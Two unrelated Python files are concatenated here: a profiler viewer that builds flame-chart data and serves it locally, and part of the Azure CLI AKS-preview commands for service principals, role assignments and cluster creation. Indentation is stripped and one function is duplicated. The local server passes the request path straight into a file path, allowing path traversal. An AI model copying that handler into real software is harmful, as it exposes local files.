key, value = item
if value[4] == {}:
roots.add(key)
default_root = ("~", 0, "<built-in method builtins.exec>")
if default_root in stats.stats:
roots.add(default_root)
roots = list(roots)
# Collect children
children = {key: [] for key in stats.stats.keys()}
for key, value in stats.stats.items():
_, _, _, _, parents = value
for parent in parents:
children[parent].append(key)
def populate(key, parent):
if parent is None:
_, _, selftime, cumtime, parent_times = stats.stats[key]
parent_times = []
else:
_, _, _, _, parent_times = stats.stats[key]
_, _, selftime, cumtime = parent_times[parent]
# Convert the tuple key into a string
name = "{}::{}::{}".format(*key)
if len(parent_times) <= 1:
# Handle children
# merge dictionaries
c = [populate(child, key) for child in children[key]]
c.append({"name": name + "::self", "color": 0, "value": selftime})
out = {"name": name, "color": 0, "children": c}
else:
out = {"name": name, "color": 0, "value": cumtime}
return out
data = {
"name": "root",
"color": 0,
"children": [populate(root, None) for root in roots],
}
return data
def _shelf(lst, k):
reference_level = lst[k][1]
out = []
while k < len(lst):
name, level, self_time = lst[k]
if level == reference_level:
out.append({"name": name, "value": self_time * 1.0e-6})
k += 1
elif level < reference_level:
return out, k
else:
assert level == reference_level + 1
out[-1]["children"], k = _shelf(lst, k)
return out, k
def _add_color(lst, ancestor_is_built_in):
for item in lst:
module_name = item["name"].split(".")[0]
is_built_in = (
ancestor_is_built_in
or module_name in built_in
or module_name in built_in_deprecated
)
color = 1 if is_built_in else 0
if module_name in built_in_deprecated:
color = 2
item["color"] = color
if "children" in item:
_add_color(item["children"], is_built_in)
return
def read_import_profile(filename):
# The import profile is of the form
# ```
# import time: self [us] | cumulative | imported package
# import time: 378 | 378 | zipimport
# import time: 1807 | 1807 | _frozen_importlib_external
# import time: 241 | 241 | _codecs
# import time: 6743 | 6984 | codecs
# import time: 1601 | 1601 | encodings.aliases
# import time: 11988 | 20571 | encodings
# import time: 700 | 700 | encodings.utf_8
# import time: 535 | 535 | _signal
# import time: 1159 | 1159 | encodings.latin_1
# [...]
# ```
# The indentation in the last column signals parent-child relationships. In the
# above example, `encodings` is parent to `encodings.aliases` and `codecs` which in
# turn is parent to `_codecs`.
entries = []
with open(filename, "r") as f:
# filtered iterator over lines prefixed with "import time: "
import_lines = (
line[len("import time: ") :].rstrip()
for line in f
if line.startswith("import time: ")
)
try:
line = next(import_lines)
except UnicodeError:
raise TunaError()
for line in import_lines:
if line == "self [us] | cumulative | imported package":
continue
items = line.split(" | ")
assert len(items) == 3
self_time = int(items[0])
last = items[2]
name = last.lstrip()
num_leading_spaces = len(last) - len(name)
assert num_leading_spaces % 2 == 0
indentation_level = num_leading_spaces // 2
entries.append((name, indentation_level, self_time))
lst, k = _shelf(entries[::-1], 0)
assert k == len(entries)
# go through the tree and add "color"
_add_color(lst, False)
return {"name": "main", "color": 0, "children": lst}
def render(data):
this_dir = os.path.dirname(__file__)
with open(os.path.join(this_dir, "web", "index.html")) as _file:
template = string.Template(_file.read())
return template.substitute(
data=escape(json.dumps(data).replace("</", "<\\/")), version=escape(__version__)
)
def start_server(prof_filename, start_browser, port):
data = read(prof_filename)
class StaticServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
if self.path == "/":
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(render(data).encode("utf-8"))
else:
this_dir = os.path.dirname(__file__)
# Remove the leading slash in self.path
filepath = os.path.join(this_dir, "web", self.path[1:])
mimetype, _ = mimetypes.guess_type(filepath)
self.send_header("Content-type", mimetype)
self.end_headers()
with open(filepath, "rb") as fh:
content = fh.read()
self.wfile.write(content)
return
httpd = HTTPServer(("", port), StaticServer)
if start_browser:
address = "http://localhost:{}".format(port)
threading.Thread(target=lambda: webbrowser.open_new_tab(address)).start()
print("Starting httpd on port {}".format(port))
httpd.serve_forever()
return
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
from math import isnan
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterAPIServerAccessProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_03_01.models import ManagedClusterSKU
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_PREFIX, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_SHARED, CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
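# Hedged aside (not part of the original module): on Python 3 the lookup above
# is roughly equivalent to the standard-library call
#
#     import shutil
#     shutil.which('kubectl')
#
# which also honors PATHEXT on Windows.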
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
            break
        except URLError:
            time.sleep(1)
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
    t = threading.Thread(target=wait_then_open, args=(url,))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
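# Hedged example (illustrative values only):
#     _get_default_dns_prefix('myAKSCluster', 'my-rg', '0123abcd-...') -> 'myAKSClust-my-rg-0123ab'
# (cluster name trimmed to 10 characters, resource group to 16, subscription id to 6).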
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
    if not any([ids, assignee, role, resource_group_name, scope, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
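# Hedged examples (hypothetical ids):
#     _build_role_scope(None, None, '0000-1111')    -> '/subscriptions/0000-1111'
#     _build_role_scope('my-rg', None, '0000-1111') -> '/subscriptions/0000-1111/resourceGroups/my-rg'
#     _build_role_scope('my-rg', '/subscriptions/0000-1111/x', '0000-1111') raises CLIError,
#     since an explicit scope makes the resource group argument redundant.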
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
            if err.output.find(b'unknown flag: --address') != -1:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
('omsagent' in result.addon_profiles) and
(hasattr(result.addon_profiles['omsagent'], 'identity')) and
(hasattr(result.addon_profiles['omsagent'].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles['omsagent'].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=None,
appgw_watch_namespace=None,
enable_aad=False,
aad_admin_group_object_ids=None,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
availability_zones=node_zones,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
